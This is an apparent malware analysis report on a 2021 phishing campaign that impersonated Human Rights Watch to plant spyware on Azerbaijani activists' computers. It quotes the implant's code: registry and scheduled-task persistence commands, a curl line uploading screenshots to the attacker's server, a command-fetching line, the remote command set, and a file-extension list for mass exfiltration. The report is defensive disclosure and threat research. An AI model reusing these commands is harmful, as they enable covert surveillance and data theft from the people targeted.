10 July 2021
On July 7th, several prominent human rights and political activists in Azerbaijan received a targeted phishing mail in the name of Human Rights Watch. The mail included a link to a malware, with the capability of webcam and Desktop recording, execution of windows commands (WMI) as well as extraction and uploading of selected files from the victim’s computer.
This report presents an analysis of the malware and explains how it was built, its capabilities, and where it was hosted.
The email was sent from a Gmail account (human.rights.invoicer at gmail.com) with the subject “Human Rights Watch Invoice Form”. The mail asked the recipient to fill up an “Invoice Form” and provided a link to what seemed to be a Word Document with the name “Human Rights Invoice Form Document – 2021“.
When following the link provided in the mail, a Google Drive document is retrieved and downloaded.
The downloaded document is RAR v5 compressed and password protected file.
Path: Human Rights Invoice Form Document -2021.exe Size: 1070592 bytes (1046 KiB) Modified: 2021-07-07 06:57:13
Once uncompressed, a Windows PE32 executable is extracted. A quick look into the hexdump of the binary file shows the sequence “A3 48 4B BE 98 6C 4A A9 99 4C 53 0A 86 D6 48 7D” that suggests the presence of a malware written in AutoIT v3.
After being executed, the malware displays the message: “Unsopported Microsoft Word version!” & @CRLF & “File corrupted. Error numer: 0x65415681”. Note the use of the misspelled words “Unsopported” and “Numer”.
The malware immediately performs a DNS lookup and connects to the domain shoesbuysellone{.}live to download the main binary ModeMaintenance.Exe (AutoIT v3).
The main part of the malware is registered as a service with the name “WindowsServiceTelemetry” and the binary is invoked as a task is scheduled to run every 3 minutes
ReG AdD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsServiceTelemetry" /t REG_SZ /d "%APPDATA%\notificationsrvc\ModeMaintenance.Exe" /f schtasks /create /tn "WindowsServiceTelemetry" /tr "%APPDATA%\notificationsrvc\ModeMaintenance.Exe" /sc MINUTE /MO 3 /f
This binary starts to download a set of “requirements” for the future Implant(s) to work.
requirement/up/bin/vlc.zip (VLC Video Recording) requirement/up/bin/libcurl.dll requirement/up/bin/toolbarnotification.exe (curl) requirement/up/bin/7zxa.dll (compression libs) requirement/up/bin/7za.exe requirement/up/bin/7za.dll requirement/up/bin/UserTelemetryService.exe (AutoIT v3, Implant Management)
The malware starts to make Desktop screenshoots and use the Curl binary (toolbarnotification.exe) to upload them.
$INSTALLDIR = @APPDATADIR & "\" & "notificationsrvc\"
%APPDATA%\notificationsrvc\\toolbarnotification.exe -s -o nul -k --max-time 5 -A "Mozilla/5.0 (Windows NT 10.0; rv:54.0) Gecko/20100101 Firefox/86.0.1" -F "file=@%TEMP%\_data_temp_12345.1234567890\12345.1234567890.jpg" https://shoesbuysellone{.}live/upload.php?GUID=uuid>
Apart from making screen captures in JPG format, the malware includes the following functions that gave us an idea of its capabilities: Desktop and webcam recording, execution of windows commands (WMI) and data exfiltration. When connecting periodically to the website, the webserver pushes commands back to the infected machine.
https://shoesbuysellone{.}live/upload.php?GUID=uuid?come=1
$TASKS = BINARYTOSTRING ( INETREAD ( $UPLOAD_HOST & "?GUID=" & GETGUID ( ) & "&come=1",0))
Some of this commands are:
desktoprecord webcamrecord download implant makepersistent massdownload stopimplant upload uploadexec wmicexec aueval
For example, the malware compiles a list of “interesting files” in the victim computer with the extensions and uses the function “massdownload” to upload them to the server shoesbuysellone{.}live
$INTERESTING_EXTS = “.ppt;.avi;.pptx;.odt;.pdf;.txt;.msf;.docx;.xml;.doc;.rtf;.jpg;.jpeg;.png;.xls;.xlsx;.rdp;.zip;.rar;.sql;.sqlite;.php;.avi;.mp4;.tar;.tar.gz;.7z;.bz2;*.tar.bz2″